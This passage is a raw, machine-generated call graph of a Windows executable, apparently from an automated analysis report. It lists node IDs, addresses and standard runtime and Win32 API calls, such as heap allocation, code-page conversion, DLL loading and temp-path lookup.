16523->16546 16525 7ff6c82122f9 16561 7ff6c8211fc4 16525->16561 16528 7ff6c8212316 16528->16459 16531 7ff6c821232f 16532 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16531->16532 16532->16528 16533 7ff6c821233e 16533->16533 16575 7ff6c821266c 16533->16575 16536 7ff6c821243a 16537 7ff6c8204f08 _get_daylight 11 API calls 16536->16537 16538 7ff6c821243f 16537->16538 16540 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16538->16540 16539 7ff6c8212495 16542 7ff6c82124fc 16539->16542 16586 7ff6c8211df4 16539->16586 16540->16528 16541 7ff6c8212454 16541->16539 16544 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16541->16544 16543 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16542->16543 16543->16528 16544->16539 16547 7ff6c8212557 16546->16547 16549 7ff6c8212561 16547->16549 16601 7ff6c82102d8 EnterCriticalSection 16547->16601 16551 7ff6c82125d3 16549->16551 16553 7ff6c820a504 __CxxCallCatchBlock 45 API calls 16549->16553 16551->16525 16555 7ff6c82125eb 16553->16555 16556 7ff6c8212642 16555->16556 16558 7ff6c820b224 50 API calls 16555->16558 16556->16525 16559 7ff6c821262c 16558->16559 16560 7ff6c82122c4 65 API calls 16559->16560 16560->16556 16602 7ff6c8204f4c 16561->16602 16564 7ff6c8211ff6 16566 7ff6c821200b 16564->16566 16567 7ff6c8211ffb GetACP 16564->16567 16565 7ff6c8211fe4 GetOEMCP 16565->16566 16566->16528 16568 7ff6c820d5fc 16566->16568 16567->16566 16569 7ff6c820d647 16568->16569 16573 7ff6c820d60b _get_daylight 16568->16573 16571 7ff6c8204f08 _get_daylight 11 API calls 16569->16571 16570 7ff6c820d62e HeapAlloc 16572 7ff6c820d645 16570->16572 16570->16573 16571->16572 16572->16531 16572->16533 16573->16569 16573->16570 16574 7ff6c8213590 _get_daylight 2 API calls 16573->16574 16574->16573 16576 7ff6c8211fc4 47 API calls 16575->16576 16577 7ff6c8212699 16576->16577 16579 7ff6c82126d6 IsValidCodePage 16577->16579 16584 7ff6c82127ef 16577->16584 16585 7ff6c82126f0 memcpy_s 16577->16585 16578 7ff6c81fc550 _log10_special 8 API calls 16580 7ff6c8212431 16578->16580 16581 7ff6c82126e7 16579->16581 16579->16584 16580->16536 16580->16541 16582 7ff6c8212716 GetCPInfo 16581->16582 16581->16585 16582->16584 16582->16585 16584->16578 16634 7ff6c82120dc 16585->16634 16721 7ff6c82102d8 EnterCriticalSection 16586->16721 16603 7ff6c8204f70 16602->16603 16609 7ff6c8204f6b 16602->16609 16604 7ff6c820b150 __CxxCallCatchBlock 45 API calls 16603->16604 16603->16609 16605 7ff6c8204f8b 16604->16605 16610 7ff6c820d984 16605->16610 16609->16564 16609->16565 16611 7ff6c820d999 16610->16611 16613 7ff6c8204fae 16610->16613 16611->16613 16618 7ff6c8213304 16611->16618 16614 7ff6c820d9f0 16613->16614 16615 7ff6c820da18 16614->16615 16616 7ff6c820da05 16614->16616 16615->16609 16616->16615 16631 7ff6c8212650 16616->16631 16619 7ff6c820b150 __CxxCallCatchBlock 45 API calls 16618->16619 16620 7ff6c8213313 16619->16620 16621 7ff6c821335e 16620->16621 16630 7ff6c82102d8 EnterCriticalSection 16620->16630 16621->16613 16632 7ff6c820b150 __CxxCallCatchBlock 45 API calls 16631->16632 16633 7ff6c8212659 16632->16633 16635 7ff6c8212119 GetCPInfo 16634->16635 16636 7ff6c821220f 16634->16636 16635->16636 16641 7ff6c821212c 16635->16641 16637 7ff6c81fc550 _log10_special 8 API calls 16636->16637 16638 7ff6c82122ae 16637->16638 16638->16584 16645 7ff6c8212e40 16641->16645 16646 7ff6c8204f4c 45 API calls 16645->16646 16647 7ff6c8212e82 16646->16647 16665 7ff6c820f8a0 16647->16665 16666 7ff6c820f8a9 MultiByteToWideChar 16665->16666 16726 7ff6c82094ad 16722->16726 16727 7ff6c8209349 16722->16727 16723 7ff6c82094d6 16725 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16723->16725 16724 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16724->16726 16725->16727 16726->16723 16726->16724 16727->16498 16729 7ff6c82162d8 16728->16729 16730 7ff6c82162c1 16728->16730 16729->16730 16733 7ff6c82162e6 16729->16733 16731 7ff6c8204f08 _get_daylight 11 API calls 16730->16731 16732 7ff6c82162c6 16731->16732 16734 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 16732->16734 16735 7ff6c8204f4c 45 API calls 16733->16735 16736 7ff6c82162d1 16733->16736 16734->16736 16735->16736 16736->16204 16738 7ff6c8204f4c 45 API calls 16737->16738 16739 7ff6c8218f71 16738->16739 16742 7ff6c8218bc8 16739->16742 16746 7ff6c8218c16 16742->16746 16743 7ff6c81fc550 _log10_special 8 API calls 16744 7ff6c8217205 16743->16744 16744->16204 16744->16230 16745 7ff6c8218c9d 16747 7ff6c820f8a0 _fread_nolock MultiByteToWideChar 16745->16747 16751 7ff6c8218ca1 16745->16751 16746->16745 16748 7ff6c8218c88 GetCPInfo 16746->16748 16746->16751 16749 7ff6c8218d35 16747->16749 16748->16745 16748->16751 16750 7ff6c820d5fc _fread_nolock 12 API calls 16749->16750 16749->16751 16752 7ff6c8218d6c 16749->16752 16750->16752 16751->16743 16752->16751 16753 7ff6c820f8a0 _fread_nolock MultiByteToWideChar 16752->16753 16754 7ff6c8218dda 16753->16754 16755 7ff6c8218ebc 16754->16755 16756 7ff6c820f8a0 _fread_nolock MultiByteToWideChar 16754->16756 16755->16751 16757 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16755->16757 16758 7ff6c8218e00 16756->16758 16757->16751 16758->16755 16759 7ff6c820d5fc _fread_nolock 12 API calls 16758->16759 16760 7ff6c8218e2d 16758->16760 16759->16760 16760->16755 16761 7ff6c820f8a0 _fread_nolock MultiByteToWideChar 16760->16761 16762 7ff6c8218ea4 16761->16762 16763 7ff6c8218eaa 16762->16763 16764 7ff6c8218ec4 16762->16764 16763->16755 16766 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16763->16766 16771 7ff6c820ef68 16764->16771 16766->16755 16768 7ff6c8218f03 16768->16751 16770 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16768->16770 16769 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16769->16768 16770->16751 16772 7ff6c820ed10 __crtLCMapStringW 5 API calls 16771->16772 16773 7ff6c820efa6 16772->16773 16774 7ff6c820efae 16773->16774 16775 7ff6c820f1d0 __crtLCMapStringW 5 API calls 16773->16775 16774->16768 16774->16769 16776 7ff6c820f017 CompareStringW 16775->16776 16776->16774 16778 7ff6c8217c5a HeapSize 16777->16778 16779 7ff6c8217c41 16777->16779 16780 7ff6c8204f08 _get_daylight 11 API calls 16779->16780 16781 7ff6c8217c46 16780->16781 16782 7ff6c820a8e0 _invalid_parameter_noinfo 37 API calls 16781->16782 16783 7ff6c8217c51 16782->16783 16783->16237 16785 7ff6c8217c89 16784->16785 16786 7ff6c8217c93 16784->16786 16787 7ff6c820d5fc _fread_nolock 12 API calls 16785->16787 16788 7ff6c8217c98 16786->16788 16794 7ff6c8217c9f _get_daylight 16786->16794 16793 7ff6c8217c91 16787->16793 16789 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16788->16789 16789->16793 16790 7ff6c8217cd2 HeapReAlloc 16790->16793 16790->16794 16791 7ff6c8217ca5 16792 7ff6c8204f08 _get_daylight 11 API calls 16791->16792 16792->16793 16793->16239 16794->16790 16794->16791 16795 7ff6c8213590 _get_daylight 2 API calls 16794->16795 16795->16794 16797 7ff6c820ed10 __crtLCMapStringW 5 API calls 16796->16797 16798 7ff6c820ef44 16797->16798 16798->16243 16800 7ff6c82054fa 16799->16800 16801 7ff6c82054d6 16799->16801 16802 7ff6c8205554 16800->16802 16803 7ff6c82054ff 16800->16803 16804 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16801->16804 16806 7ff6c82054e5 16801->16806 16805 7ff6c820f8a0 _fread_nolock MultiByteToWideChar 16802->16805 16803->16806 16808 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16803->16808 16813 7ff6c8205514 16803->16813 16804->16806 16812 7ff6c8205570 16805->16812 16806->16247 16806->16248 16807 7ff6c8205577 GetLastError 16821 7ff6c8204e7c 16807->16821 16808->16813 16809 7ff6c820d5fc _fread_nolock 12 API calls 16809->16806 16811 7ff6c82055b2 16811->16806 16816 7ff6c820f8a0 _fread_nolock MultiByteToWideChar 16811->16816 16812->16807 16812->16811 16815 7ff6c82055a5 16812->16815 16819 7ff6c820a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16812->16819 16813->16809 16820 7ff6c820d5fc _fread_nolock 12 API calls 16815->16820 16817 7ff6c82055f6 16816->16817 16817->16806 16817->16807 16818 7ff6c8204f08 _get_daylight 11 API calls 16818->16806 16819->16815 16820->16811 16822 7ff6c820b2c8 _get_daylight 11 API calls 16821->16822 16823 7ff6c8204e89 Concurrency::details::SchedulerProxy::DeleteThis 16822->16823 16824 7ff6c820b2c8 _get_daylight 11 API calls 16823->16824 16825 7ff6c8204eab 16824->16825 16825->16818 16885 7ff6c81fcc3c 16906 7ff6c81fce0c 16885->16906 16888 7ff6c81fcd88 17060 7ff6c81fd12c IsProcessorFeaturePresent 16888->17060 16889 7ff6c81fcc58 __scrt_acquire_startup_lock 16891 7ff6c81fcd92 16889->16891 16896 7ff6c81fcc76 __scrt_release_startup_lock 16889->16896 16892 7ff6c81fd12c 7 API calls 16891->16892 16894 7ff6c81fcd9d __CxxCallCatchBlock 16892->16894 16893 7ff6c81fcc9b 16895 7ff6c81fcd21 16912 7ff6c81fd274 16895->16912 16896->16893 16896->16895 17049 7ff6c8209b2c 16896->17049 16898 7ff6c81fcd26 16915 7ff6c81f1000 16898->16915 16903 7ff6c81fcd49 16903->16894 17056 7ff6c81fcf90 16903->17056 16907 7ff6c81fce14 16906->16907 16908 7ff6c81fce20 __scrt_dllmain_crt_thread_attach 16907->16908 16909 7ff6c81fcc50 16908->16909 16910 7ff6c81fce2d 16908->16910 16909->16888 16909->16889 16910->16909 17067 7ff6c81fd888 16910->17067 17094 7ff6c821a4d0 16912->17094 16914 7ff6c81fd28b GetStartupInfoW 16914->16898 16916 7ff6c81f1009 16915->16916 17096 7ff6c8205484 16916->17096 16918 7ff6c81f37fb 17103 7ff6c81f36b0 16918->17103 16922 7ff6c81fc550 _log10_special 8 API calls 16924 7ff6c81f3ca7 16922->16924 17054 7ff6c81fd2b8 GetModuleHandleW 16924->17054 16925 7ff6c81f383c 17270 7ff6c81f1c80 16925->17270 16926 7ff6c81f391b 17279 7ff6c81f45c0 16926->17279 16929 7ff6c81f385b 17175 7ff6c81f8830 16929->17175 16932 7ff6c81f396a 17302 7ff6c81f2710 16932->17302 16933 7ff6c81f388e 16943 7ff6c81f38bb __std_exception_copy 16933->16943 17274 7ff6c81f89a0 16933->17274 16936 7ff6c81f395d 16937 7ff6c81f3984 16936->16937 16938 7ff6c81f3962 16936->16938 16939 7ff6c81f1c80 49 API calls 16937->16939 17298 7ff6c820004c 16938->17298 16942 7ff6c81f39a3 16939->16942 16948 7ff6c81f1950 115 API calls 16942->16948 16944 7ff6c81f8830 14 API calls 16943->16944 16951 7ff6c81f38de __std_exception_copy 16943->16951 16944->16951 16945 7ff6c81f8940 40 API calls 16946 7ff6c81f3a0b 16945->16946 16947 7ff6c81f89a0 40 API calls 16946->16947 16949 7ff6c81f3a17 16947->16949 16950 7ff6c81f39ce 16948->16950 16952 7ff6c81f89a0 40 API calls 16949->16952 16950->16929 16953 7ff6c81f39de 16950->16953 16951->16945 16957 7ff6c81f390e __std_exception_copy 16951->16957 16954 7ff6c81f3a23 16952->16954 16955 7ff6c81f2710 54 API calls 16953->16955 16956 7ff6c81f89a0 40 API calls 16954->16956 17048 7ff6c81f3808 __std_exception_copy 16955->17048 16956->16957 16958 7ff6c81f8830 14 API calls 16957->16958 16959 7ff6c81f3a3b 16958->16959 16960 7ff6c81f3b2f 16959->16960 16961 7ff6c81f3a60 __std_exception_copy 16959->16961 16962 7ff6c81f2710 54 API calls 16960->16962 16972 7ff6c81f3aab 16961->16972 17188 7ff6c81f8940 16961->17188 16962->17048 16964 7ff6c81f8830 14 API calls 16965 7ff6c81f3bf4 __std_exception_copy 16964->16965 16966 7ff6c81f3d41 16965->16966 16967 7ff6c81f3c46 16965->16967 17313 7ff6c81f44e0 16966->17313 16968 7ff6c81f3cd4 16967->16968 16969 7ff6c81f3c50 16967->16969 16974 7ff6c81f8830 14 API calls 16968->16974 17195 7ff6c81f90e0 16969->17195 16971 7ff6c81f3d4f 16976 7ff6c81f3d65 16971->16976 16977 7ff6c81f3d71 16971->16977 16972->16964 16975 7ff6c81f3ce0 16974->16975 16979 7ff6c81f3c61 16975->16979 16982 7ff6c81f3ced 16975->16982 17316 7ff6c81f4630 16976->17316 16981 7ff6c81f1c80 49 API calls 16977->16981 16984 7ff6c81f2710 54 API calls 16979->16984 16991 7ff6c81f3cc8 __std_exception_copy 16981->16991 16985 7ff6c81f1c80 49 API calls 16982->16985 16984->17048 16988 7ff6c81f3d0b 16985->16988 16986 7ff6c81f3dc4 17245 7ff6c81f9390 16986->17245 16990 7ff6c81f3d12 16988->16990 16988->16991 16994 7ff6c81f2710 54 API calls 16990->16994 16991->16986 16992 7ff6c81f3da7 SetDllDirectoryW LoadLibraryExW 16991->16992 16992->16986 16993 7ff6c81f3dd7 SetDllDirectoryW 16996 7ff6c81f3e0a 16993->16996 17037 7ff6c81f3e5a 16993->17037 16994->17048 16997 7ff6c81f8830 14 API calls 16996->16997 17005 7ff6c81f3e16 __std_exception_copy 16997->17005 16998 7ff6c81f4008 17000 7ff6c81f4035 16998->17000 17001 7ff6c81f4012 PostMessageW GetMessageW 16998->17001 16999 7ff6c81f3f1b 17250 7ff6c81f33c0 16999->17250 17393 7ff6c81f3360 17000->17393 17001->17000 17008 7ff6c81f3ef2 17005->17008 17012 7ff6c81f3e4e 17005->17012 17011 7ff6c81f8940 40 API calls 17008->17011 17011->17037 17012->17037 17319 7ff6c81f6dc0 17012->17319 17017 7ff6c81f6fc0 FreeLibrary 17019 7ff6c81f405b 17017->17019 17025 7ff6c81f3e81 17028 7ff6c81f3ea2 17025->17028 17039 7ff6c81f3e85 17025->17039 17340 7ff6c81f6e00 17025->17340 17028->17039 17359 7ff6c81f71b0 17028->17359 17037->16998 17037->16999 17039->17037 17375 7ff6c81f2a50 17039->17375 17048->16922 17050 7ff6c8209b43 17049->17050 17051 7ff6c8209b64 17049->17051 17050->16895 19416 7ff6c820a3d8 17051->19416 17055 7ff6c81fd2c9 17054->17055 17055->16903 17057 7ff6c81fcfa1 17056->17057 17058 7ff6c81fcd60 17057->17058 17059 7ff6c81fd888 7 API calls 17057->17059 17058->16893 17059->17058 17061 7ff6c81fd152 __CxxCallCatchBlock memcpy_s 17060->17061 17062 7ff6c81fd171 RtlCaptureContext RtlLookupFunctionEntry 17061->17062 17063 7ff6c81fd19a RtlVirtualUnwind 17062->17063 17064 7ff6c81fd1d6 memcpy_s 17062->17064 17063->17064 17065 7ff6c81fd208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17064->17065 17066 7ff6c81fd256 __CxxCallCatchBlock 17065->17066 17066->16891 17068 7ff6c81fd890 17067->17068 17069 7ff6c81fd89a 17067->17069 17073 7ff6c81fdc24 17068->17073 17069->16909 17074 7ff6c81fdc33 17073->17074 17075 7ff6c81fd895 17073->17075 17081 7ff6c81fde60 17074->17081 17077 7ff6c81fdc90 17075->17077 17078 7ff6c81fdcbb 17077->17078 17079 7ff6c81fdcbf 17078->17079 17080 7ff6c81fdc9e DeleteCriticalSection 17078->17080 17079->17069 17080->17078 17085 7ff6c81fdcc8 17081->17085 17086 7ff6c81fddb2 TlsFree 17085->17086 17092 7ff6c81fdd0c __vcrt_FlsAlloc 17085->17092 17087 7ff6c81fdd3a LoadLibraryExW 17089 7ff6c81fdd5b GetLastError 17087->17089 17090 7ff6c81fddd9 17087->17090 17088 7ff6c81fddf9 GetProcAddress 17088->17086 17089->17092 17090->17088 17091 7ff6c81fddf0 FreeLibrary 17090->17091 17091->17088 17092->17086 17092->17087 17092->17088 17093 7ff6c81fdd7d LoadLibraryExW 17092->17093 17093->17090 17093->17092 17095 7ff6c821a4c0 17094->17095 17095->16914 17095->17095 17098 7ff6c820f480 17096->17098 17097 7ff6c820f4d3 17099 7ff6c820a814 _invalid_parameter_noinfo 37 API calls 17097->17099 17098->17097 17100 7ff6c820f526 17098->17100 17102 7ff6c820f4fc 17099->17102 17406 7ff6c820f358 17100->17406 17102->16918 17414 7ff6c81fc850 17103->17414 17106 7ff6c81f3710 17416 7ff6c81f9280 FindFirstFileExW 17106->17416 17107 7ff6c81f36eb GetLastError 17421 7ff6c81f2c50 17107->17421 17111 7ff6c81f3723 17436 7ff6c81f9300 CreateFileW 17111->17436 17112 7ff6c81f377d 17447 7ff6c81f9440 17112->17447 17113 7ff6c81fc550 _log10_special 8 API calls 17116 7ff6c81f37b5 17113->17116 17116->17048 17125 7ff6c81f1950 17116->17125 17118 7ff6c81f378b 17119 7ff6c81f3706 17118->17119 17122 7ff6c81f2810 49 API calls 17118->17122 17119->17113 17120 7ff6c81f3734 17439 7ff6c81f2810 17120->17439 17121 7ff6c81f374c __vcrt_FlsAlloc 17121->17112 17122->17119 17126 7ff6c81f45c0 108 API calls 17125->17126 17127 7ff6c81f1985 17126->17127 17128 7ff6c81f1c43 17127->17128 17130 7ff6c81f7f90 83 API calls 17127->17130 17129 7ff6c81fc550 _log10_special 8 API calls 17128->17129 17131 7ff6c81f1c5e 17129->17131 17132 7ff6c81f19cb 17130->17132 17131->16925 17131->16926 17174 7ff6c81f1a03 17132->17174 17792 7ff6c82006d4 17132->17792 17134 7ff6c820004c 74 API calls 17134->17128 17135 7ff6c81f19e5 17136 7ff6c81f1a08 17135->17136 17137 7ff6c81f19e9 17135->17137 17796 7ff6c820039c 17136->17796 17138 7ff6c8204f08 _get_daylight 11 API calls 17137->17138 17140 7ff6c81f19ee 17138->17140 17799 7ff6c81f2910 17140->17799 17143 7ff6c81f1a45 17148 7ff6c81f1a5c 17143->17148 17149 7ff6c81f1a7b 17143->17149 17144 7ff6c81f1a26 17145 7ff6c8204f08 _get_daylight 11 API calls 17144->17145 17146 7ff6c81f1a2b 17145->17146 17147 7ff6c81f2910 54 API calls 17146->17147 17147->17174 17150 7ff6c8204f08 _get_daylight 11 API calls 17148->17150 17151 7ff6c81f1c80 49 API calls 17149->17151 17152 7ff6c81f1a61 17150->17152 17153 7ff6c81f1a92 17151->17153 17154 7ff6c81f2910 54 API calls 17152->17154 17155 7ff6c81f1c80 49 API calls 17153->17155 17154->17174 17156 7ff6c81f1add 17155->17156 17157 7ff6c82006d4 73 API calls 17156->17157 17158 7ff6c81f1b01 17157->17158 17159 7ff6c81f1b35 17158->17159 17160 7ff6c81f1b16 17158->17160 17161 7ff6c820039c _fread_nolock 53 API calls 17159->17161 17162 7ff6c8204f08 _get_daylight 11 API calls 17160->17162 17163 7ff6c81f1b4a 17161->17163 17164 7ff6c81f1b1b 17162->17164 17166 7ff6c81f1b50 17163->17166 17167 7ff6c81f1b6f 17163->17167 17165 7ff6c81f2910 54 API calls 17164->17165 17165->17174 17168 7ff6c8204f08 _get_daylight 11 API calls 17166->17168 17814 7ff6c8200110 17167->17814 17170 7ff6c81f1b55 17168->17170 17172 7ff6c81f2910 54 API calls 17170->17172 17172->17174 17173 7ff6c81f2710 54 API calls 17173->17174 17174->17134 17176 7ff6c81f883a 17175->17176 17177 7ff6c81f9390 2 API calls 17176->17177 17178 7ff6c81f8859 GetEnvironmentVariableW 17177->17178 17179 7ff6c81f88c2 17178->17179 17180 7ff6c81f8876 ExpandEnvironmentStringsW 17178->17180 17181 7ff6c81fc550 _log10_special 8 API calls 17179->17181 17180->17179 17182 7ff6c81f8898 17180->17182 17183 7ff6c81f88d4 17181->17183 17184 7ff6c81f9440 2 API calls 17182->17184 17183->16933 17185 7ff6c81f88aa 17184->17185 17186 7ff6c81fc550 _log10_special 8 API calls 17185->17186 17187 7ff6c81f88ba 17186->17187 17187->16933 17189 7ff6c81f9390 2 API calls 17188->17189 17190 7ff6c81f895c 17189->17190 17191 7ff6c81f9390 2 API calls 17190->17191 17192 7ff6c81f896c 17191->17192 18029 7ff6c8208238 17192->18029 17194 7ff6c81f897a __std_exception_copy 17194->16972 17196 7ff6c81f90f5 17195->17196 18047 7ff6c81f8570 GetCurrentProcess OpenProcessToken 17196->18047 17199 7ff6c81f8570 7 API calls 17200 7ff6c81f9121 17199->17200 17201 7ff6c81f9154 17200->17201 17202 7ff6c81f913a 17200->17202 17204 7ff6c81f26b0 48 API calls 17201->17204 17203 7ff6c81f26b0 48 API calls 17202->17203 17205 7ff6c81f9152 17203->17205 17206 7ff6c81f9167 LocalFree LocalFree 17204->17206 17205->17206 17207 7ff6c81f9183 17206->17207 17209 7ff6c81f918f 17206->17209 18057 7ff6c81f2b50 17207->18057 17210 7ff6c81fc550 _log10_special 8 API calls 17209->17210 17211 7ff6c81f3c55 17210->17211 17211->16979 17212 7ff6c81f8660 17211->17212 17213 7ff6c81f8678 17212->17213 17214 7ff6c81f869c 17213->17214 17215 7ff6c81f86fa GetTempPathW GetCurrentProcessId 17213->17215 17217 7ff6c81f8830 14 API calls 17214->17217 18066 7ff6c81f25c0 17215->18066 17219 7ff6c81f86a8 17217->17219 17218 7ff6c81f8728 __std_exception_copy 17230 7ff6c81f8765 __std_exception_copy 17218->17230 18070 7ff6c8208b68 17218->18070 18073 7ff6c81f81d0 17219->18073 17224 7ff6c81f86e8 __std_exception_copy 17244 7ff6c81f87d4 __std_exception_copy 17224->17244 17226 7ff6c8208238 38 API calls 17227 7ff6c81f86ce __std_exception_copy 17226->17227 17227->17215 17233 7ff6c81f86dc 17227->17233 17236 7ff6c81f9390 2 API calls 17230->17236 17230->17244 17231 7ff6c81fc550 _log10_special 8 API calls 17232 7ff6c81f3cbb 17231->17232 17232->16979 17232->16991 17235 7ff6c81f2810 49 API calls 17233->17235 17235->17224 17237 7ff6c81f87b1 17236->17237 17238 7ff6c81f87e9 17237->17238 17239 7ff6c81f87b6 17237->17239 17241 7ff6c8208238 38 API calls 17238->17241 17240 7ff6c81f9390 2 API calls 17239->17240 17242 7ff6c81f87c6 17240->17242 17241->17244 17243 7ff6c8208238 38 API calls 17242->17243 17243->17244 17244->17231 17246 7ff6c81f93b2 MultiByteToWideChar 17245->17246 17248 7ff6c81f93d6 17245->17248 17246->17248 17249 7ff6c81f93ec __std_exception_copy 17246->17249 17247 7ff6c81f93f3 MultiByteToWideChar 17247->17249 17248->17247 17248->17249 17249->16993 17255 7ff6c81f33ce memcpy_s 17250->17255 17251 7ff6c81f35c7 17252 7ff6c81fc550 _log10_special 8 API calls 17251->17252 17253 7ff6c81f3664 17252->17253 17253->17048 17269 7ff6c81f90c0 LocalFree 17253->17269 17255->17251 17256 7ff6c81f1c80 49 API calls 17255->17256 17257 7ff6c81f35e2 17255->17257 17261 7ff6c81f35c9 17255->17261 17263 7ff6c81f2a50 54 API calls 17255->17263 17267 7ff6c81f35d0 17255->17267 18339 7ff6c81f4560 17255->18339 18345 7ff6c81f7e20 17255->18345 18356 7ff6c81f1600 17255->18356 18404 7ff6c81f7120 17255->18404 18408 7ff6c81f4190 17255->18408 18452 7ff6c81f4450 17255->18452 17256->17255 17259 7ff6c81f2710 54 API calls 17257->17259 17259->17251 17264 7ff6c81f2710 54 API calls 17261->17264 17263->17255 17264->17251 17268 7ff6c81f2710 54 API calls 17267->17268 17268->17251 17271 7ff6c81f1ca5 17270->17271 17272 7ff6c8204984 49 API calls 17271->17272 17273 7ff6c81f1cc8 17272->17273 17273->16929 17275 7ff6c81f9390 2 API calls 17274->17275 17276 7ff6c81f89b4 17275->17276 17277 7ff6c8208238 38 API calls 17276->17277 17278 7ff6c81f89c6 __std_exception_copy 17277->17278 17278->16943 17280 7ff6c81f45cc 17279->17280 17281 7ff6c81f9390 2 API calls 17280->17281 17282 7ff6c81f45f4 17281->17282 17283 7ff6c81f9390 2 API calls 17282->17283 17284 7ff6c81f4607 17283->17284 18619 7ff6c8205f94 17284->18619 17287 7ff6c81fc550 _log10_special 8 API calls 17288 7ff6c81f392b 17287->17288 17288->16932 17289 7ff6c81f7f90 17288->17289 17290 7ff6c81f7fb4 17289->17290 17291 7ff6c82006d4 73 API calls 17290->17291 17296 7ff6c81f808b __std_exception_copy 17290->17296 17292 7ff6c81f7fd0 17291->17292 17292->17296 19010 7ff6c82078c8 17292->19010 17294 7ff6c82006d4 73 API calls 17297 7ff6c81f7fe5 17294->17297 17295 7ff6c820039c _fread_nolock 53 API calls 17295->17297 17296->16936 17297->17294 17297->17295 17297->17296 17299 7ff6c820007c 17298->17299 19025 7ff6c81ffe28 17299->19025 17301 7ff6c8200095 17301->16932 17303 7ff6c81fc850 17302->17303 17304 7ff6c81f2734 GetCurrentProcessId 17303->17304 17305 7ff6c81f1c80 49 API calls 17304->17305 17306 7ff6c81f2787 17305->17306 17307 7ff6c8204984 49 API calls 17306->17307 17308 7ff6c81f27cf 17307->17308 17309 7ff6c81f2620 12 API calls 17308->17309 17310 7ff6c81f27f1 17309->17310 17311 7ff6c81fc550 _log10_special 8 API calls 17310->17311 17312 7ff6c81f2801 17311->17312 17312->17048 17314 7ff6c81f1c80 49 API calls 17313->17314 17315 7ff6c81f44fd 17314->17315 17315->16971 17317 7ff6c81f1c80 49 API calls 17316->17317 17318 7ff6c81f4660 17317->17318 17318->16991 17320 7ff6c81f6dd5 17319->17320 17321 7ff6c81f3e6c 17320->17321 17322 7ff6c8204f08 _get_daylight 11 API calls 17320->17322 17325 7ff6c81f7340 17321->17325 17323 7ff6c81f6de2 17322->17323 17324 7ff6c81f2910 54 API calls 17323->17324 17324->17321 19036 7ff6c81f1470 17325->19036 17327 7ff6c81f7368 17328 7ff6c81f4630 49 API calls 17327->17328 17338 7ff6c81f74b9 __std_exception_copy 17327->17338 17329 7ff6c81f738a 17328->17329 17330 7ff6c81f738f 17329->17330 17331 7ff6c81f4630 49 API calls 17329->17331 17332 7ff6c81f2a50 54 API calls 17330->17332 17333 7ff6c81f73ae 17331->17333 17332->17338 17333->17330 17334 7ff6c81f4630 49 API calls 17333->17334 17338->17025 17347 7ff6c81f6e1c 17340->17347 17341 7ff6c81fc550 _log10_special 8 API calls 17342 7ff6c81f1840 45 API calls 17342->17347 17344 7ff6c81f6faa 17346 7ff6c81f2710 54 API calls 17344->17346 17345 7ff6c81f1c80 49 API calls 17345->17347 17356 7ff6c81f6f3f 17346->17356 17347->17342 17347->17344 17347->17345 17348 7ff6c81f6f97 17347->17348 17349 7ff6c81f4560 10 API calls 17347->17349 17351 7ff6c81f7e20 52 API calls 17347->17351 17352 7ff6c81f2a50 54 API calls 17347->17352 17353 7ff6c81f6f84 17347->17353 17355 7ff6c81f1600 118 API calls 17347->17355 17347->17356 17357 7ff6c81f6f6d 17347->17357 17350 7ff6c81f2710 54 API calls 17348->17350 17349->17347 17350->17356 17351->17347 17352->17347 17354 7ff6c81f2710 54 API calls 17353->17354 17354->17356 17355->17347 17356->17341 17358 7ff6c81f2710 54 API calls 17357->17358 17358->17356 19066 7ff6c81f8e80 17359->19066 17376 7ff6c81fc850 17375->17376 19142 7ff6c81f6360 17393->19142 17401 7ff6c81f3399 17402 7ff6c81f3670 17401->17402 17403 7ff6c81f367e 17402->17403 17404 7ff6c81f368f 17403->17404 19415 7ff6c81f8e60 FreeLibrary 17403->19415 17404->17017 17413 7ff6c820546c EnterCriticalSection 17406->17413 17415 7ff6c81f36bc GetModuleFileNameW 17414->17415 17415->17106 17415->17107 17417 7ff6c81f92d2 17416->17417 17418 7ff6c81f92bf FindClose 17416->17418 17419 7ff6c81fc550 _log10_special 8 API calls 17417->17419 17418->17417 17420 7ff6c81f371a 17419->17420 17420->17111 17420->17112 17422 7ff6c81fc850 17421->17422 17423 7ff6c81f2c70 GetCurrentProcessId 17422->17423 17452 7ff6c81f26b0 17423->17452 17425 7ff6c81f2cb9 17456 7ff6c8204bd8 17425->17456 17428 7ff6c81f26b0 48 API calls 17429 7ff6c81f2d34 FormatMessageW 17428->17429 17431 7ff6c81f2d7f MessageBoxW 17429->17431 17432 7ff6c81f2d6d 17429->17432 17433 7ff6c81fc550 _log10_special 8 API calls 17431->17433 17434 7ff6c81f26b0 48 API calls 17432->17434 17435 7ff6c81f2daf 17433->17435 17434->17431 17435->17119 17437 7ff6c81f9340 GetFinalPathNameByHandleW CloseHandle 17436->17437 17438 7ff6c81f3730 17436->17438 17437->17438 17438->17120 17438->17121 17440 7ff6c81f2834 17439->17440 17441 7ff6c81f26b0 48 API calls 17440->17441 17442 7ff6c81f2887 17441->17442 17443 7ff6c8204bd8 48 API calls 17442->17443 17444 7ff6c81f28d0 MessageBoxW 17443->17444 17445 7ff6c81fc550 _log10_special 8 API calls 17444->17445 17446 7ff6c81f2900 17445->17446 17446->17119 17448 7ff6c81f946a WideCharToMultiByte 17447->17448 17449 7ff6c81f9495 17447->17449 17448->17449 17451 7ff6c81f94ab __std_exception_copy 17448->17451 17450 7ff6c81f94b2 WideCharToMultiByte 17449->17450 17449->17451 17450->17451 17451->17118 17453 7ff6c81f26d5 17452->17453 17454 7ff6c8204bd8 48 API calls 17453->17454 17455 7ff6c81f26f8 